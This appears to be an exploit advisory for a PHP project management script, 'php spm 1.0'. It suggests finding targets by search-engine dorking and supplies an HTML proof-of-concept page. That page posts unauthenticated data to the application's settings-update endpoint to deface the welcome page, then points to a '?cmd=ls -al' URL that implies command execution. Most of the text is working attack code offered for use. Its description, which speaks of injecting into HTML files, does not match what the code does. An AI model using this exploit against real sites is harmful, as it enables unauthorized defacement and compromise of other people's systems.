============================================================================================================================================= | # Title : php spm 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload. [+] Line 11 Set your file name & payload. [+] save payload as poc.html [+] payload : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> PHP code injection Tool</title> <script> async function sendRequest() { const url = document.getElementById('url').value; const postData = { 'content[welcome]': `Hacked by indoushka` }; try { const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(postData).toString() }); if (response.ok) { document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n'; } else { document.getElementById('result').innerText = 'Error: ' + response.statusText; } } catch (error) { document.getElementById('result').innerText = 'Error making request: ' + error.message; } } </script> </head> <body> <h1>Injection Tool</h1> <form onsubmit="event.preventDefault(); sendRequest();"> <label for="url">Enter URL:</label> <input type="text" id="url" name="url" required> <button type="submit">Submit</button> </form> <pre id="result"></pre> </body> </html> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================